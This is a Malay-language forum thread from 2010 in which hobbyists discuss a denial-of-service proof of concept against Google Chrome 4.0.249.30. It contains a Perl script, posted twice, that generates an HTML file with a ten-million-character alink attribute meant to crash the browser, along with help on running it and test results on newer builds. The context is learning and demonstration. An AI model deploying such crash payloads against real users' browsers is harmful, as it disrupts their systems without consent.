Forum Sementara Putera.com

Would you like to react to this message? Create an account in a few clicks or log in to continue.
Forum Sementara Putera.com

Bersama kita perkemaskan forum ini sementara forum asal dalam pemulihan.

Forum putera dah kembali. Masalah sudah berjaya diselesaikan. Sila lawati http://forum.putera.com/tanya


4 posters

    security : Google Chrome version 4.0.249.30 denial of service proof of concept exploit.

    avatar
    ahfat797
    Ahli Baharu
    Ahli Baharu


    Number of posts : 22
    Registration date : 30/01/2010

    security : Google Chrome version 4.0.249.30 denial of service proof of concept exploit. - Page 2 Empty Re: security : Google Chrome version 4.0.249.30 denial of service proof of concept exploit.

    Post by ahfat797 Sun Jan 31, 2010 4:26 pm

    johnburn, aku da brjaye install activeperl tu,
    tp mcm mane nk runkn scrip ni kt perl packet manager?

    $file="poc.html";
    $poc='a/' x 10000000;
    open(myfile,">>$file");
    print myfile '<head><meta http-equiv="refresh" content="1; url=http://www.google.com"></head>';
    print myfile "<body alink=";
    print myfile $poc;
    print myfile '">';
    close(myfile);
    print "Finished\n";




    @hampeh
    sharing is caring, huhu
    hampeh
    hampeh
    Ahli
    Ahli


    Number of posts : 866
    Registration date : 28/02/2009

    security : Google Chrome version 4.0.249.30 denial of service proof of concept exploit. - Page 2 Empty Re: security : Google Chrome version 4.0.249.30 denial of service proof of concept exploit.

    Post by hampeh Sun Jan 31, 2010 4:28 pm

    exploit lain kena setup server , forum , dan lain2 ,banyak kerja. hehe Wink
    avatar
    ahfat797
    Ahli Baharu
    Ahli Baharu


    Number of posts : 22
    Registration date : 30/01/2010

    security : Google Chrome version 4.0.249.30 denial of service proof of concept exploit. - Page 2 Empty Re: security : Google Chrome version 4.0.249.30 denial of service proof of concept exploit.

    Post by ahfat797 Sun Jan 31, 2010 4:30 pm

    hampeh wrote:exploit lain kena setup server , forum , dan lain2 ,banyak kerja. hehe Wink

    seriously, aku x tau sape ko.. hahaha
    hampeh
    hampeh
    Ahli
    Ahli


    Number of posts : 866
    Registration date : 28/02/2009

    security : Google Chrome version 4.0.249.30 denial of service proof of concept exploit. - Page 2 Empty Re: security : Google Chrome version 4.0.249.30 denial of service proof of concept exploit.

    Post by hampeh Sun Jan 31, 2010 4:37 pm

    seriously, aku x tau sape ko.. hahaha
    lagi bagus.. wahahaha , good luck diucapkan untuk kita2 yang kena buat kerja exploit nih. haha
    johnburn
    johnburn
    Moderators
    Moderators


    Gender : Male Number of posts : 755
    Location : Terengganu
    Registration date : 07/03/2009

    security : Google Chrome version 4.0.249.30 denial of service proof of concept exploit. - Page 2 Empty Re: security : Google Chrome version 4.0.249.30 denial of service proof of concept exploit.

    Post by johnburn Sun Jan 31, 2010 4:37 pm

    ahfat797 wrote:johnburn, aku da brjaye install activeperl tu,
    tp mcm mane nk runkn scrip ni kt perl packet manager?

    $file="poc.html";
    $poc='a/' x 10000000;
    open(myfile,">>$file");
    print myfile '<head><meta http-equiv="refresh" content="1; url=http://www.google.com"></head>';
    print myfile "<body alink=";
    print myfile $poc;
    print myfile '">';
    close(myfile);
    print "Finished\n";

    just savekn code tu sebagai apeapenama.pl then bukak command prompt, cd ke directory yg ko save file tu td, then type blk nama file tu pas dh cd (cnth:apeapenama.pl) dan tkan enter. spatutnya script tu akan run sbb time instal activeperl tu, die ptt dh setkn file association untuk .pl
    johnburn
    johnburn
    Moderators
    Moderators


    Gender : Male Number of posts : 755
    Location : Terengganu
    Registration date : 07/03/2009

    security : Google Chrome version 4.0.249.30 denial of service proof of concept exploit. - Page 2 Empty Re: security : Google Chrome version 4.0.249.30 denial of service proof of concept exploit.

    Post by johnburn Sun Jan 31, 2010 4:38 pm

    hampeh wrote:exploit lain kena setup server , forum , dan lain2 ,banyak kerja. hehe Wink
    pilih exploit yg ko rase yakin nk explain la. byk kje skit pn xpe Razz
    avatar
    ahfat797
    Ahli Baharu
    Ahli Baharu


    Number of posts : 22
    Registration date : 30/01/2010

    security : Google Chrome version 4.0.249.30 denial of service proof of concept exploit. - Page 2 Empty Re: security : Google Chrome version 4.0.249.30 denial of service proof of concept exploit.

    Post by ahfat797 Sun Jan 31, 2010 4:44 pm

    style bro, aku da brjaya..
    thx bro johnburn..
    best gak security ni.. aha.,
    johnburn
    johnburn
    Moderators
    Moderators


    Gender : Male Number of posts : 755
    Location : Terengganu
    Registration date : 07/03/2009

    security : Google Chrome version 4.0.249.30 denial of service proof of concept exploit. - Page 2 Empty Re: security : Google Chrome version 4.0.249.30 denial of service proof of concept exploit.

    Post by johnburn Sun Jan 31, 2010 4:45 pm

    ahfat797 wrote:style bro, aku da brjaya..
    thx bro johnburn..
    best gak security ni.. aha.,
    so prepare la keterangan sbb ape jd cmtu Razz

    lg satu, tunjuk comparison antara chrome yg vulnerable ngan yg dh patch
    avatar
    ahfat797
    Ahli Baharu
    Ahli Baharu


    Number of posts : 22
    Registration date : 30/01/2010

    security : Google Chrome version 4.0.249.30 denial of service proof of concept exploit. - Page 2 Empty Re: security : Google Chrome version 4.0.249.30 denial of service proof of concept exploit.

    Post by ahfat797 Sun Jan 31, 2010 4:48 pm

    [quote="johnburn"]
    ahfat797 wrote:tunjuk comparison antara chrome yg vulnerable ngan yg dh patch

    xfham mksd bro?
    ape bezanya?
    johnburn
    johnburn
    Moderators
    Moderators


    Gender : Male Number of posts : 755
    Location : Terengganu
    Registration date : 07/03/2009

    security : Google Chrome version 4.0.249.30 denial of service proof of concept exploit. - Page 2 Empty Re: security : Google Chrome version 4.0.249.30 denial of service proof of concept exploit.

    Post by johnburn Sun Jan 31, 2010 4:53 pm

    ahfat797 wrote:
    xfham mksd bro?
    ape bezanya?

    mksd aku, try kt chrome yg latest. spttnye die dh xcrash dan akan redirect ke page google kl bukak file poc.html tu. aku test kt chromium 5.0.308.0, xcrash dh dan die redirect pergi ke site google. chrome dibina berasaskn code chromium, so mngkn kt version chrome yg latest pn dh x crash dh.
    avatar
    ahfat797
    Ahli Baharu
    Ahli Baharu


    Number of posts : 22
    Registration date : 30/01/2010

    security : Google Chrome version 4.0.249.30 denial of service proof of concept exploit. - Page 2 Empty Re: security : Google Chrome version 4.0.249.30 denial of service proof of concept exploit.

    Post by ahfat797 Sun Jan 31, 2010 4:58 pm

    owh... faham2...
    btw, ape fungsi activeperl tu?
    kenape lalalala.pl , .pl tu ape sebenarnye?
    script yg die bg tu bole diedit?
    johnburn
    johnburn
    Moderators
    Moderators


    Gender : Male Number of posts : 755
    Location : Terengganu
    Registration date : 07/03/2009

    security : Google Chrome version 4.0.249.30 denial of service proof of concept exploit. - Page 2 Empty Re: security : Google Chrome version 4.0.249.30 denial of service proof of concept exploit.

    Post by johnburn Sun Jan 31, 2010 5:11 pm

    perl merupakan interpreted programing langguage, mcm phyton, ruby, php etc.
    mksdnye dia perlukan interpreter untuk run. so activeperl kira die pnye interpreter la. mcm kl kita nk run file php gak, kite perlu install php

    .pl tu merupakan extension untuk file perl. sama cam .bat untuk file batch, .cpp untuk file c++, .txt untuk file text. tu extension supaya sistem kenal tu file apa dan tau apa nk buat dgn file tersebut (program apa yg perlu dipakai untuk run file tersebut). File association dlm registry akan menghubungkan file extension dgn program ape yg akan digunakan untuk menjalankan file tersebut. dlm kes ni file .pl akan dijalankan oleh perl (interpreter).

    sama mcm mne2 programing language len, ko bleh buat mcm2 dn pkai perl ni. so bkn stakat nk ubah code tu, tp ko bleh buat len2 bnda lg kl tau Razz
    avatar
    ahfat797
    Ahli Baharu
    Ahli Baharu


    Number of posts : 22
    Registration date : 30/01/2010

    security : Google Chrome version 4.0.249.30 denial of service proof of concept exploit. - Page 2 Empty Re: security : Google Chrome version 4.0.249.30 denial of service proof of concept exploit.

    Post by ahfat797 Sun Jan 31, 2010 5:19 pm

    owh..
    thank you bro..
    johnburn
    johnburn
    Moderators
    Moderators


    Gender : Male Number of posts : 755
    Location : Terengganu
    Registration date : 07/03/2009

    security : Google Chrome version 4.0.249.30 denial of service proof of concept exploit. - Page 2 Empty Re: security : Google Chrome version 4.0.249.30 denial of service proof of concept exploit.

    Post by johnburn Sun Jan 31, 2010 5:22 pm

    oo btw, jgn confuse. perl script tu bkn exploit. die just pkai perl script untuk hasilkan file exploit tu (poc.html) sbb kl nk type manually a/ sampai 10000000 kali rasenye sgt ssh hehe
    avatar
    ahfat797
    Ahli Baharu
    Ahli Baharu


    Number of posts : 22
    Registration date : 30/01/2010

    security : Google Chrome version 4.0.249.30 denial of service proof of concept exploit. - Page 2 Empty Re: security : Google Chrome version 4.0.249.30 denial of service proof of concept exploit.

    Post by ahfat797 Sun Jan 31, 2010 5:30 pm

    aku da try kt chrome 5.0.307.1 beta
    result still same.. crash
    johnburn
    johnburn
    Moderators
    Moderators


    Gender : Male Number of posts : 755
    Location : Terengganu
    Registration date : 07/03/2009

    security : Google Chrome version 4.0.249.30 denial of service proof of concept exploit. - Page 2 Empty Re: security : Google Chrome version 4.0.249.30 denial of service proof of concept exploit.

    Post by johnburn Sun Jan 31, 2010 5:35 pm

    err ye ke? xtau haha. aku x test kt chrome sbb xde, tp kat chromium 5.0.308.0
    spttnye xde beza sgt sbb chrome dibina berasaskan code chromium. cuba try ngan latest stable version, jgn yg beta
    avatar
    ahfat797
    Ahli Baharu
    Ahli Baharu


    Number of posts : 22
    Registration date : 30/01/2010

    security : Google Chrome version 4.0.249.30 denial of service proof of concept exploit. - Page 2 Empty Re: security : Google Chrome version 4.0.249.30 denial of service proof of concept exploit.

    Post by ahfat797 Sun Jan 31, 2010 5:52 pm

    5.0.307.1
    result pun same gak.. haha
    johnburn
    johnburn
    Moderators
    Moderators


    Gender : Male Number of posts : 755
    Location : Terengganu
    Registration date : 07/03/2009

    security : Google Chrome version 4.0.249.30 denial of service proof of concept exploit. - Page 2 Empty Re: security : Google Chrome version 4.0.249.30 denial of service proof of concept exploit.

    Post by johnburn Sun Jan 31, 2010 5:57 pm

    haha mungkin kne tggu version 5.0.308.0, same ngan version chromium aku Razz
    hampeh
    hampeh
    Ahli
    Ahli


    Number of posts : 866
    Registration date : 28/02/2009

    security : Google Chrome version 4.0.249.30 denial of service proof of concept exploit. - Page 2 Empty Re: security : Google Chrome version 4.0.249.30 denial of service proof of concept exploit.

    Post by hampeh Sun Jan 31, 2010 10:56 pm

    Jadi jugak exploit aku buat, rupanya memang kena pakai win xp sp3 .
    bazsh
    bazsh
    Ahli Baharu
    Ahli Baharu


    Gender : Male Number of posts : 401
    Age : 42
    Location : New Castle
    Job/hobbies : Surfing/Games
    Registration date : 20/02/2009

    security : Google Chrome version 4.0.249.30 denial of service proof of concept exploit. - Page 2 Empty Re: security : Google Chrome version 4.0.249.30 denial of service proof of concept exploit.

    Post by bazsh Mon Feb 01, 2010 5:09 pm

    Sori la aku out of topic jap

    Nape Google Chrome cepat sangat kuarkan version baru yer?
    Version 4 hari tu pun still dalam Beta tp skrg dh kuar version 5
    Tgk pada Change Log xder la major improvement sgt kat version 5 ni
    Ada sape2 leh jawab? Razz
    hampeh
    hampeh
    Ahli
    Ahli


    Number of posts : 866
    Registration date : 28/02/2009

    security : Google Chrome version 4.0.249.30 denial of service proof of concept exploit. - Page 2 Empty Re: security : Google Chrome version 4.0.249.30 denial of service proof of concept exploit.

    Post by hampeh Mon Feb 01, 2010 5:28 pm

    mungkin critical bugfix kot tapi dia rahsiakan ataupun ni yang dipanggil nightly build saja kasi orang rasa in development punya software.
    bazsh
    bazsh
    Ahli Baharu
    Ahli Baharu


    Gender : Male Number of posts : 401
    Age : 42
    Location : New Castle
    Job/hobbies : Surfing/Games
    Registration date : 20/02/2009

    security : Google Chrome version 4.0.249.30 denial of service proof of concept exploit. - Page 2 Empty Re: security : Google Chrome version 4.0.249.30 denial of service proof of concept exploit.

    Post by bazsh Mon Feb 01, 2010 6:39 pm

    hampeh wrote:mungkin critical bugfix kot tapi dia rahsiakan ataupun ni yang dipanggil nightly build saja kasi orang rasa in development punya software.
    Kira mcm ala2 gimik jer la yer?
    hampeh
    hampeh
    Ahli
    Ahli


    Number of posts : 866
    Registration date : 28/02/2009

    security : Google Chrome version 4.0.249.30 denial of service proof of concept exploit. - Page 2 Empty Re: security : Google Chrome version 4.0.249.30 denial of service proof of concept exploit.

    Post by hampeh Mon Feb 01, 2010 6:45 pm

    tak jugak , lebih kepada kasi merasa(rasa bug la haha,tapi aku dulu pakai firefox nightly build ni ok je skali sekala je problem) .. user pun boleh gak bagi pendapat apa function yang ada bug @ dibuang tapi user still nak. Macam firefox 3.6 ni boleh pulak dia buang function untuk tengok properties image .. nasib baik ada plugin .. huhu

    Sponsored content


    security : Google Chrome version 4.0.249.30 denial of service proof of concept exploit. - Page 2 Empty Re: security : Google Chrome version 4.0.249.30 denial of service proof of concept exploit.

    Post by Sponsored content


      Current date/time is Fri Mar 29, 2024 2:29 pm